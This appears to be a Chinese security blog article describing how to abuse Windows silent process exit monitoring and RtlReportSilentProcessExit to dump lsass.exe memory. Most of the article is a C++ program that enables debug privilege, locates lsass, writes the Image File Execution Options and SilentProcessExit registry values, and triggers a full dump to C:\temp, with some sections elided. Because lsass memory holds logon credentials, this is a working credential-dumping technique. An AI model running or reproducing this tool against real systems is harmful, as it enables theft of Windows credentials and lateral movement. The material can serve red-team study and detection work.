一起聊聊静默退出与Dump

安全 应用安全
如果我们要对某进程使用静默退出,我们可以在注册表中如下设置,将GlobalFlag值设置为0x200,当然我们需要先设置ProcessName项指定进程。

前言

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。(本文仅用于交流学习)

基础知识

我们先来看看什么是静默退出,在Windows7开始,就可以设置对指定进程的静默退出(官方术语是"无提示进程退出")。监视功能不会检测进程最后一个线程退出时发生的正常进程终止,监视功能不会检测由内核模式代码启动的进程终止。
如果我们要对某进程使用静默退出,我们可以在注册表中如下设置,将GlobalFlag值设置为0x200,当然我们需要先设置ProcessName项指定进程

HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName  
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName\\GlobalFlag

我们还可以配置当进程以无提示方式退出时要执行的操作。可以配置通知、事件日志记录和转储文件的创建,因为我们要Dump,因此我们重点关心转储文件的创建。
这里有全局配置与应用程序设置两种

  • 全局设置:适用于静默退出监视的所有进程,在注册表中的位置如下HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
  • 应用程序设置:设用于单个进程的设置,在注册中设置的位置如下HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\ProcessName

我们这里选择应用程序设置即可,没必要使用全局的设置。还有很多设置,但是这里我们只看我们需要使用的,所有我们来看看报告模式,大致就是检测到进程静默退出后,执行的操作(但是此设置不能用于全局设置)

ReportingMode有三个值可以设置,这里我们选择LOCAL_DUMP(0x2)

既然我们使用转储文件,那么还需要指定转储文件的位置

LocalDumpFolder所对应的值即可我们转储文件所存放的位置,那对于我们的转储文件有没有大小的限制呢,默认情况下是没有限制的。

我们还需要看看转储类型

我们可以设置DumpType的值去指定我们需要转储的类型,上面图片可能看不太明白,这不影响,我们可以设置为2,为什么设置为2我们看看如下

然后就是最重要的一步了,如何使进程崩溃(lsass.exe进程崩溃的话会导致机器重启),显然真的让其崩溃肯定不可取。我们可以利用RtlReportSilentProcessExit这个函数API,该API会与Windows错误报告服务(WerSvcGroup下的WerSvc)通信,告诉服务该进程正在执行静默退出。然后,WER服务将启动WerFault.exe,该文件将转储现有进程。但是调用此API不会导致进程退出。所有这一步就解决了。
关于RtlReportSilentProcessExit函数的定义

现在应该思路很清晰了吧,我们可以写个简单的利用程序来帮助我们自动化Dump,我们可以利用Windows API函数帮助我们去设置这些值,这里主要用到RegCreateKeyExW、RegSetValueExW,对于这两个函数的用法与用途,我们来简单的介绍一下

RegCreateKeyExW

该函数主要用于打开指定的注册表的项,如果不存在那么就创建,我们编写一个简单的程序来看看效果

#include <windows.h>  
#include <iostream>

using namespace std;

int main() {
HKEY hKey \= HKEY\_CURRENT\_USER;
LPCWSTR lpSubKey \= L"Software\\\\test";
HKEY phkResult \= NULL;
DWORD Result \= NULL;

RegCreateKeyExW(hKey, lpSubKey, 0, NULL, REG\_OPTION\_NON\_VOLATILE, KEY\_ALL\_ACCESS, NULL, &phkResult, &Result);
if (Result \== 0x00000001L) {
cout << "\[+\] 密钥不存在且已创建" << endl;
}
else if (Result \== 0x00000002L)
{
cout << "\[+\] 密钥已存在" << endl;
}
else
{
cout << "\[-\] RegCreateKeyExW Error" << endl;
}

}

RegSetValueExW

该函数主要就是在指定的子项中设定指定的数值

#include <windows.h>  
#include <iostream>

using namespace std;

int main() {
HKEY hKey \= HKEY\_CURRENT\_USER;
LPCWSTR lpSubKey \= L"Software\\\\test";
HKEY phkResult \= NULL;

LSTATUS Open \= RegOpenKeyExW(hKey, lpSubKey, REG\_OPTION\_NON\_VOLATILE, KEY\_ALL\_ACCESS, &phkResult);
if (Open != ERROR\_SUCCESS) {
cout << "\[-\] Not found" << endl;

return 1;
}
cout << "\[+\] RegOpenKeyExW Success" << endl;

DWORD Test\_Value \= 0x20;
LSTATUS SetValye \= RegSetValueExW(phkResult, L"test", 0, REG\_DWORD, (const BYTE\*)&Test\_Value, sizeof(DWORD));
if (SetValye != ERROR\_SUCCESS) {
cout << "\[-\] RegSetValueExW Error" << endl;

return 1;
}
cout << "\[+\] RegSetValueExW Success" << endl;
}

好了我们现在来总结一下步骤

  • RegCreateKeyExW、RegSetValueExW设置注册表中的HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessName 、HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessName\GlobalFlag
  • RegCreateKeyExW、RegSetValueExW设置注册表中的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\ProcessName
  • 设置好后获取目标进程,后调用RtlReportSilentProcessExit

代码实现

#include <windows.h>
#include <iostream>
#include <string>
#include <tlhelp32.h>
#include <processthreadsapi.h>
#include <DbgHelp.h>

using namespace std;

typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_func) (
_In_ HANDLE ProcessHandle,
_In_ NTSTATUS ExitStatus
);

RtlReportSilentProcessExit_func RtlReportSilentProcessExit = (RtlReportSilentProcessExit_func)GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlReportSilentProcessExit");

typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled
);

_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlAdjustPrivilege");

int SeDebugPrivilege() {
ULONG t;
RtlAdjustPrivilege(20, TRUE, FALSE, &t);
if (RtlAdjustPrivilege == NULL) {
cout << "[-] Unable to resolve RtlAdjustPrivilege" << endl;
return 1;
}

cout << "[+] RtlAdjustPrivilege Success" << endl;
}

int GetPid() {
HRESULT hr;

DWORD pid;
PROCESSENTRY32 ed;
ed.dwSize = sizeof(PROCESSENTRY32);

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(snapshot, &ed) == TRUE)
{
while (Process32Next(snapshot, &ed) == TRUE)
{
if ((string)ed.szExeFile == "lsass.exe") {
pid = ed.th32ProcessID;
}
}
}
CloseHandle(snapshot);

return pid;
}

int RegeditSet() {
HKEY hKey = HKEY_LOCAL_MACHINE;
LPCWSTR lpSubKey = L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe";
HKEY phkResult;
DWORD Result = NULL;
.............................................................
.............................................................
.............................................................
}
else
{
cout << "[-] RegCreateKeyExW SilentProcessExit Error" << endl;
return 1;
}

DWORD ReportingMode = 0x2;
WCHAR LocalDumpFolder[MAX_PATH] = L"C:\\temp";
DWORD DumpType = 0x2;

.............................................................
.............................................................
.............................................................
if (RegSetValue_ReportingMode != ERROR_SUCCESS || RegSetValue_LocalDumpFolder != ERROR_SUCCESS
|| RegSetValue_DumpType != ERROR_SUCCESS) {

cout << "[-] RegSetValueExW has an Error " << endl;
return 1;
}

cout << "[+] Success Setting All" << endl;
}

int main() {
if (RegeditSet() == 1) {
return 1;
}
DWORD pid = GetPid();
cout << "[+] Lsass Pid is:" << pid << endl;

SeDebugPrivilege();
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

if (hProcess == NULL) {
cout << "[-] OpenProcess Error" << endl;
return 1;
}
RtlReportSilentProcessExit(hProcess, 0);
cout << "[+] Path:C:\\tmp" << endl;
}

参考:(建议详细阅读完)​​https://learn.microsoft.com/zh-cn/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit​

责任编辑:武晓燕 来源: FreeBuf.COM
相关推荐

2022-04-06 08:23:57

指针函数代码

2024-02-26 00:00:00

架构老化重构

2023-12-06 08:26:19

Service数据库

2024-01-29 09:01:20

React列表模式

2023-07-04 08:06:40

数据库容器公有云

2023-08-04 08:20:56

DockerfileDocker工具

2023-09-10 21:42:31

2023-08-10 08:28:46

网络编程通信

2023-09-21 08:16:56

JDK 21向量计算计算

2022-05-24 08:21:16

数据安全API

2023-06-30 08:18:51

敏捷开发模式

2021-08-27 07:06:10

IOJava抽象

2022-12-07 09:01:14

布局容器VStack​

2024-02-20 21:34:16

循环GolangGo

2023-11-07 08:13:53

分布式网络

2024-10-07 09:39:51

2024-08-26 08:34:47

AES加密算法

2023-11-03 12:54:00

KAFKA探索中间件

2024-07-26 09:47:28

2021-08-12 07:49:24

mysql
点赞
收藏

51CTO技术栈公众号